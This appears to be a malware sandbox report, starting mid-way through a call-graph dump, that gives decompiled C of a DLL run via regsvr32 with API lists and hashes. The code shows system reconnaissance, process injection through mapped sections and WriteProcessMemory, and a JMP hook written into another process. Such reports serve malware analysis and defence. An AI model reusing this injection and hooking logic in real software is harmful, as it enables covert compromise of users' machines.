11228 1000f7fe 11226->11228 11230 1000109a HeapAlloc 11227->11230 11229 1000109a HeapAlloc 11228->11229 11231 1000f809 11229->11231 11232 1000f88d 11230->11232 11234 10006144 7 API calls 11232->11234 11286 10008604 HeapAlloc 11262->11286 11264 100061ef 11265 10006360 11264->11265 11287 10008604 HeapAlloc 11264->11287 11265->10508 11267 1000626f 11268 1000861a 2 API calls 11267->11268 11269 10006352 11268->11269 11270 1000861a 2 API calls 11269->11270 11270->11265 11271 1000628d memset memset 11272 10006209 11271->11272 11272->11265 11272->11267 11272->11271 11273 1000b1b1 10 API calls 11272->11273 11273->11272 11275 10009f95 3 API calls 11274->11275 11276 10009e87 11275->11276 11277 10009e9e 11276->11277 11278 1000861a 2 API calls 11276->11278 11277->10510 11279 10008604 HeapAlloc 11277->11279 11278->11277 11279->10514 11281 1000a245 11280->11281 11282 10009b0e HeapAlloc 11281->11282 11284 1000a275 11282->11284 11283 1000a2da 11283->10521 11284->11283 11285 1000861a 2 API calls 11284->11285 11285->11283 11286->11264 11287->11272 11289 10009e66 3 API calls 11288->11289 11290 10005642 11289->11290 11291 1000980c GetSystemTimeAsFileTime 11290->11291 11323 100056c0 11290->11323 11292 1000565b 11291->11292 11293 10009f06 4 API calls 11292->11293 11294 1000566f 11293->11294 11295 10009f06 4 API calls 11294->11295 11296 10005685 11295->11296 11324 1000e4c1 11296->11324 11299 1000a86d 5 API calls 11300 100056a4 11299->11300 11301 100056e9 11300->11301 11300->11323 11331 10008604 HeapAlloc 11300->11331 11332 1000153b CreateMutexA 11301->11332 11304 10005707 11347 100098ee 11304->11347 11306 10005715 11359 10003017 11306->11359 11323->10162 11325 1000e1bc 7 API calls 11324->11325 11326 1000e4d3 11325->11326 11327 1000e1bc 7 API calls 11326->11327 11328 1000e4ec 11327->11328 11424 1000e450 11328->11424 11330 1000568d 11330->11299 11331->11301 11333 10001558 CreateMutexA 11332->11333 11343 100015ad 11332->11343 11334 1000156e 11333->11334 11333->11343 11335 10001080 HeapAlloc 

                            Executed Functions

                            Control-flow Graph

                            C-Code - Quality: 91%
                            			E1000D01F(void* __fp0) {
                            				long _v8;
                            				long _v12;
                            				union _SID_NAME_USE _v16;
                            				struct _SYSTEM_INFO _v52;
                            				char _v180;
                            				short _v692;
                            				char _v704;
                            				char _v2680;
                            				void* __esi;
                            				struct _OSVERSIONINFOA* _t81;
                            				intOrPtr _t83;
                            				void* _t84;
                            				long _t86;
                            				void** _t88;
                            				intOrPtr _t90;
                            				intOrPtr _t91;
                            				intOrPtr _t92;
                            				intOrPtr _t97;
                            				void* _t98;
                            				intOrPtr _t103;
                            				char* _t105;
                            				void* _t108;
                            				intOrPtr _t111;
                            				long _t115;
                            				signed int _t117;
                            				long _t119;
                            				intOrPtr _t124;
                            				intOrPtr _t127;
                            				intOrPtr _t130;
                            				intOrPtr _t134;
                            				intOrPtr _t145;
                            				intOrPtr _t147;
                            				intOrPtr _t149;
                            				intOrPtr _t152;
                            				intOrPtr _t154;
                            				signed int _t159;
                            				struct HINSTANCE__* _t162;
                            				short* _t164;
                            				intOrPtr _t167;
                            				WCHAR* _t168;
                            				char* _t169;
                            				intOrPtr _t181;
                            				intOrPtr _t200;
                            				void* _t215;
                            				long _t218;
                            				void* _t219;
                            				char* _t220;
                            				struct _OSVERSIONINFOA* _t222;
                            				void* _t223;
                            				int* _t224;
                            				void* _t241;
                            
                            				_t241 = __fp0;
                            				_t162 =  *0x1001e69c; // 0x10000000
                            				_t81 = E10008604(0x1ac4);
                            				_t222 = _t81;
                            				if(_t222 == 0) {
                            					return _t81;
                            				}
                            				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                            				_t83 =  *0x1001e684; // 0x2e0faa0
                            				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                            				_t3 = _t222 + 0x648; // 0x648
                            				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                            				_t5 = _t222 + 0x1644; // 0x1644
                            				_t216 = _t5;
                            				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                            				_t227 = _t86;
                            				if(_t86 != 0) {
                            					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
                            				}
                            				GetCurrentProcess();
                            				_t88 = E1000BA05(); // executed
                            				 *(_t222 + 0x110) = _t88;
                            				_t178 =  *_t88;
                            				if(E1000BB8D( *_t88) == 0) {
                            					_t90 = E1000BA62(_t178, _t222); // executed
                            					__eflags = _t90;
                            					_t181 = (0 | _t90 > 0x00000000) + 1;
                            					__eflags = _t181;
                            					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                            				} else {
                            					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                            				}
                            				_t12 = _t222 + 0x220; // 0x220, executed
                            				_t91 = E1000E3F1(_t12); // executed
                            				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
                            				_t92 = E1000E3B6(_t12); // executed
                            				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
                            				 *(_t222 + 0x224) = _t162;
                            				_v12 = 0x80;
                            				_v8 = 0x100;
                            				_t22 = _t222 + 0x114; // 0x114
                            				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
                            					GetLastError();
                            				}
                            				_t97 =  *0x1001e694; // 0x2e0fbf8
                            				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                            				_t26 = _t222 + 0x228; // 0x228
                            				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                            				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                            				GetLastError();
                            				_t31 = _t222 + 0x228; // 0x228
                            				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
                            				_t34 = _t222 + 0x114; // 0x114, executed
                            				_t103 = E1000B7A8(_t34,  &_v692);
                            				_t35 = _t222 + 0xb0; // 0xb0
                            				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                            				_push(_t35);
                            				E1000B67D(_t103, _t35, _t98, _t241);
                            				_t37 = _t222 + 0xb0; // 0xb0
                            				_t105 = _t37;
                            				_t38 = _t222 + 0xd0; // 0xd0
                            				_t164 = _t38;
                            				if(_t105 != 0) {
                            					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                            					if(_t159 > 0) {
                            						_t164[_t159] = 0;
                            					}
                            				}
                            				_t41 = _t222 + 0x438; // 0x438
                            				_t42 = _t222 + 0x228; // 0x228
                            				E10008FD8(_t42, _t41);
                            				_t43 = _t222 + 0xb0; // 0xb0
                            				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
                            				_t44 = _t222 + 0x100c; // 0x100c
                            				E1000B88A(_t108, _t44, _t241);
                            				_t199 = GetCurrentProcess(); // executed
                            				_t111 = E1000BBDF(_t110); // executed
                            				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
                            				memset(_t222, 0, 0x9c);
                            				_t224 = _t223 + 0xc;
                            				_t222->dwOSVersionInfoSize = 0x9c;
                            				GetVersionExA(_t222);
                            				_t167 =  *0x1001e684; // 0x2e0faa0
                            				_t115 = 0;
                            				_v8 = 0;
                            				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                            					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                            					_t115 = _v8;
                            				}
                            				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                            				if(_t115 == 0) {
                            					GetSystemInfo( &_v52);
                            					_t117 = _v52.dwOemId & 0x0000ffff;
                            				} else {
                            					_t117 = 9;
                            				}
                            				_t54 = _t222 + 0x1020; // 0x1020
                            				_t168 = _t54;
                            				 *(_t222 + 0x9c) = _t117;
                            				GetWindowsDirectoryW(_t168, 0x104);
                            				_t119 = E100095E1(_t199, 0x10c);
                            				_t200 =  *0x1001e684; // 0x2e0faa0
                            				_t218 = _t119;
                            				 *_t224 = 0x104;
                            				_push( &_v704);
                            				_push(_t218);
                            				_v8 = _t218;
                            				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                            					_t154 =  *0x1001e684; // 0x2e0faa0
                            					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                            				}
                            				E100085D5( &_v8);
                            				_t124 =  *0x1001e684; // 0x2e0faa0
                            				_t61 = _t222 + 0x1434; // 0x1434
                            				_t219 = _t61;
                            				 *_t224 = 0x209;
                            				_push(_t219);
                            				_push(L"USERPROFILE");
                            				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                            					E10009640(_t219, 0x105, L"%s\\%s", _t168);
                            					_t152 =  *0x1001e684; // 0x2e0faa0
                            					_t224 =  &(_t224[5]);
                            					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                            				}
                            				_push(0x20a);
                            				_t64 = _t222 + 0x122a; // 0x122a
                            				_t169 = L"TEMP";
                            				_t127 =  *0x1001e684; // 0x2e0faa0
                            				_push(_t169);
                            				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                            					_t149 =  *0x1001e684; // 0x2e0faa0
                            					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                            				}
                            				_push(0x40);
                            				_t220 = L"SystemDrive";
                            				_push( &_v180);
                            				_t130 =  *0x1001e684; // 0x2e0faa0
                            				_push(_t220);
                            				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                            					_t147 =  *0x1001e684; // 0x2e0faa0
                            					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                            				}
                            				_v8 = 0x7f;
                            				_t72 = _t222 + 0x199c; // 0x199c
                            				_t134 =  *0x1001e684; // 0x2e0faa0
                            				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                            				_t75 = _t222 + 0x100c; // 0x100c
                            				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
                            				_t76 = _t222 + 0x1858; // 0x1858
                            				E100122D3( &_v2680, _t76, 0x20);
                            				_t79 = _t222 + 0x1878; // 0x1878
                            				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
                            				_t145 = E1000CD33(_t79); // executed
                            				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
                            				return _t222;
                            			}

                            APIs
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • GetCurrentProcessId.KERNEL32 ref: 1000D046
                            • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                            • GetCurrentProcess.KERNEL32 ref: 1000D09F
                            • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                            • GetLastError.KERNEL32 ref: 1000D13E
                            • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                            • GetLastError.KERNEL32 ref: 1000D172
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                            • GetCurrentProcess.KERNEL32 ref: 1000D20E
                              • Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                            • memset.MSVCRT ref: 1000D229
                            • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                            • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                            • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsmemset
                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                            • API String ID: 1475707489-2706916422
                            • Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                            • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                            • Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                            • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 86%
                            			E1000C6C0(void* __ecx, intOrPtr __edx) {
                            				void* _v8;
                            				void* _v12;
                            				void* _v16;
                            				void* _v20;
                            				long _v24;
                            				long _v28;
                            				void* _v32;
                            				intOrPtr _v36;
                            				long _v40;
                            				void* _v44;
                            				char _v56;
                            				char _v72;
                            				struct _WNDCLASSEXA _v120;
                            				void* _t69;
                            				intOrPtr _t75;
                            				struct HWND__* _t106;
                            				intOrPtr* _t113;
                            				struct _EXCEPTION_RECORD _t116;
                            				void* _t126;
                            				void* _t131;
                            				intOrPtr _t134;
                            				void* _t140;
                            				void* _t141;
                            
                            				_t69 =  *0x1001e688; // 0x2d90590
                            				_t126 = __ecx;
                            				_t134 = __edx;
                            				_t116 = 0;
                            				_v36 = __edx;
                            				_v16 = 0;
                            				_v44 = 0;
                            				_v40 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				_v24 = 0;
                            				_v20 = __ecx;
                            				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                            					E1000E23E(0x1f4);
                            					_t116 = 0;
                            				}
                            				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                            				_v28 = _t116;
                            				if( *_t113 != 0x4550) {
                            					L12:
                            					if(_v8 != 0) {
                            						_t75 =  *0x1001e780; // 0x2e0fbc8
                            						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                            						_v8 = _v8 & 0x00000000;
                            					}
                            					L14:
                            					if(_v12 != 0) {
                            						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
                            					}
                            					if(_v16 != 0) {
                            						NtClose(_v16);
                            					}
                            					return _v8;
                            				}
                            				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                            				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
                            					goto L12;
                            				}
                            				_v120.style = 0xb;
                            				_v120.cbSize = 0x30;
                            				_v120.lpszClassName =  &_v56;
                            				asm("movsd");
                            				_v120.lpfnWndProc = DefWindowProcA;
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsb");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsw");
                            				asm("movsb");
                            				_v120.cbWndExtra = 0;
                            				_v120.lpszMenuName = 0;
                            				_v120.cbClsExtra = 0;
                            				_v120.hInstance = 0;
                            				if(RegisterClassExA( &_v120) != 0) {
                            					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
                            					if(_t106 != 0) {
                            						DestroyWindow(_t106); // executed
                            						UnregisterClassA( &_v56, 0);
                            					}
                            				}
                            				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                            					_t126 = _v20;
                            					goto L12;
                            				} else {
                            					_t126 = _v20;
                            					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                            						goto L12;
                            					}
                            					_t140 = E10008669( *0x1001e688, 0x1ac4);
                            					_v32 = _t140;
                            					if(_t140 == 0) {
                            						goto L12;
                            					}
                            					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                            					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
                            					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
                            					E1000861A( &_v32, 0x1ac4);
                            					_t141 =  *0x1001e688; // 0x2d90590
                            					 *0x1001e688 = _t131;
                            					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                            					E1000C63F(_v12, _v8, _v36);
                            					 *0x1001e688 = _t141;
                            					goto L14;
                            				}
                            			}

                            APIs
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                            • RegisterClassExA.USER32 ref: 1000C785
                            • CreateWindowExA.USER32 ref: 1000C7B0
                            • DestroyWindow.USER32 ref: 1000C7BB
                            • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
                            • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                            • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                            • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                            • NtClose.NTDLL(00000000), ref: 1000C8F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                            • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                            • API String ID: 2002808388-2319545179
                            • Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                            • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
                            • Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                            • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 82%
                            			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                            				long _v8;
                            				char _v16;
                            				short _v144;
                            				short _v664;
                            				void* _t19;
                            				struct HINSTANCE__* _t22;
                            				long _t23;
                            				long _t24;
                            				char* _t27;
                            				WCHAR* _t32;
                            				long _t33;
                            				void* _t38;
                            				void* _t49;
                            				struct _SECURITY_ATTRIBUTES* _t53;
                            				void* _t54;
                            				intOrPtr* _t55;
                            				void* _t57;
                            
                            				_t49 = __edx;
                            				OutputDebugStringA("Hello qqq"); // executed
                            				if(_a8 != 1) {
                            					if(_a8 != 0) {
                            						L12:
                            						return 1;
                            					}
                            					SetLastError(0xaa);
                            					L10:
                            					return 0;
                            				}
                            				E100085EF();
                            				_t19 = E1000980C( &_v16);
                            				_t57 = _t49;
                            				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                            					goto L12;
                            				} else {
                            					E10008F78();
                            					GetModuleHandleA(0);
                            					_t22 = _a4;
                            					 *0x1001e69c = _t22;
                            					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                            					_t24 = GetLastError();
                            					if(_t23 != 0 && _t24 != 0x7a) {
                            						memset( &_v144, 0, 0x80);
                            						_t55 = _t54 + 0xc;
                            						_t53 = 0;
                            						do {
                            							_t27 = E100095C7(_t53);
                            							_a8 = _t27;
                            							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                            							E100085C2( &_a8);
                            							_t53 =  &(_t53->nLength);
                            						} while (_t53 < 0x2710);
                            						E10012A5B( *0x1001e69c);
                            						 *_t55 = 0x7c3;
                            						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
                            						 *_t55 = 0xb4e;
                            						_t32 = E100095E1(0x1001ba28);
                            						_a8 = _t32;
                            						_t33 = GetFileAttributesW(_t32); // executed
                            						_push( &_a8);
                            						if(_t33 == 0xffffffff) {
                            							E100085D5();
                            							_v8 = 0;
                            							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
                            							 *0x1001e6a8 = _t38;
                            							if(_t38 == 0) {
                            								goto L10;
                            							}
                            							goto L12;
                            						}
                            						E100085D5();
                            					}
                            					goto L10;
                            				}
                            			}





















                            APIs
                            • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                            • SetLastError.KERNEL32(000000AA), ref: 100060D7
                              • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                              • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                              • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                            • GetLastError.KERNEL32 ref: 10005FEF
                            • memset.MSVCRT ref: 10006013
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                            • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                            • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                            • String ID: Hello qqq
                            • API String ID: 3435743081-3610097158
                            • Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                            • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
                            • Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                            • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 167 1000cb77-1000cb90 call 1000c4ce 170 1000cb96-1000cba4 call 1000c6c0 167->170 171 1000cc69-1000cc70 167->171 170->171 178 1000cbaa-1000cbe1 memset 170->178 172 1000cc80-1000cc87 171->172 173 1000cc72-1000cc79 FreeLibrary 171->173 175 1000cca3-1000cca9 172->175 176 1000cc89-1000cca2 call 1000861a 172->176 173->172 176->175 178->171 183 1000cbe7-1000cc27 NtProtectVirtualMemory 178->183 184 1000cc67 183->184 185 1000cc29-1000cc44 NtWriteVirtualMemory 183->185 184->171 185->184 186 1000cc46-1000cc65 NtProtectVirtualMemory 185->186 186->171 186->184
                            C-Code - Quality: 93%
                            			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                            				long _v8;
                            				long _v12;
                            				void* _v16;
                            				intOrPtr _v23;
                            				void _v24;
                            				long _v28;
                            				void* _v568;
                            				void _v744;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				struct HINSTANCE__* _t32;
                            				intOrPtr _t33;
                            				intOrPtr _t35;
                            				void* _t39;
                            				intOrPtr _t43;
                            				void* _t63;
                            				long _t65;
                            				void* _t70;
                            				void** _t73;
                            				void* _t74;
                            
                            				_t73 = __edx;
                            				_t63 = __ecx;
                            				_t74 = 0;
                            				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
                            					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
                            					_t74 = _t39;
                            					if(_t74 != 0) {
                            						memset( &_v744, 0, 0x2cc);
                            						_v744 = 0x10002;
                            						_push( &_v744);
                            						_t43 =  *0x1001e684; // 0x2e0faa0
                            						_push(_t73[1]);
                            						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
                            							_t70 = _v568;
                            							_v12 = _v12 & 0x00000000;
                            							_v24 = 0xe9;
                            							_t65 = 5;
                            							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
                            							_v8 = _t65;
                            							_v16 = _t70;
                            							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
                            								L6:
                            								_t74 = 0;
                            							} else {
                            								_v28 = _v28 & 0x00000000;
                            								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                            									goto L6;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_t32 =  *0x1001e77c; // 0x0
                            				if(_t32 != 0) {
                            					FreeLibrary(_t32);
                            					 *0x1001e77c =  *0x1001e77c & 0x00000000;
                            				}
                            				_t33 =  *0x1001e784; // 0x0
                            				if(_t33 != 0) {
                            					_t35 =  *0x1001e684; // 0x2e0faa0
                            					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
                            					E1000861A(0x1001e784, 0xfffffffe);
                            				}
                            				return _t74;
                            			}

























                            APIs
                              • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                              • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                              • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                              • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                              • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                              • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                              • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                            • memset.MSVCRT ref: 1000CBB8
                            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                            • String ID:
                            • API String ID: 317994034-0
                            • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                            • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
                            • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                            • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 187 1000aba3-1000abc7 CreateToolhelp32Snapshot 188 1000ac38-1000ac3e 187->188 189 1000abc9-1000abf2 memset Process32First 187->189 190 1000ac02-1000ac13 call 1000ccc0 189->190 191 1000abf4-1000ac00 189->191 195 1000ac15-1000ac26 Process32Next 190->195 196 1000ac28-1000ac35 CloseHandle 190->196 191->188 195->190 195->196 196->188
                            C-Code - Quality: 100%
                            			E1000ABA3(intOrPtr __ecx, void* __edx) {
                            				void* _v304;
                            				void* _v308;
                            				signed int _t14;
                            				signed int _t15;
                            				void* _t22;
                            				intOrPtr _t28;
                            				void* _t31;
                            				intOrPtr _t33;
                            				void* _t40;
                            				void* _t42;
                            
                            				_t33 = __ecx;
                            				_t31 = __edx; // executed
                            				_t14 = CreateToolhelp32Snapshot(2, 0);
                            				_t42 = _t14;
                            				_t15 = _t14 | 0xffffffff;
                            				if(_t42 != _t15) {
                            					memset( &_v304, 0, 0x128);
                            					_v304 = 0x128;
                            					if(Process32First(_t42,  &_v304) != 0) {
                            						while(1) {
                            							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
                            							_t40 = _t22;
                            							if(_t40 == 0) {
                            								break;
                            							}
                            							_t33 =  *0x1001e684; // 0x2e0faa0
                            							if(Process32Next(_t42,  &_v308) != 0) {
                            								continue;
                            							}
                            							break;
                            						}
                            						CloseHandle(_t42);
                            						_t15 = 0 | _t40 == 0x00000000;
                            					} else {
                            						_t28 =  *0x1001e684; // 0x2e0faa0
                            						 *((intOrPtr*)(_t28 + 0x30))(_t42);
                            						_t15 = 0xfffffffe;
                            					}
                            				}
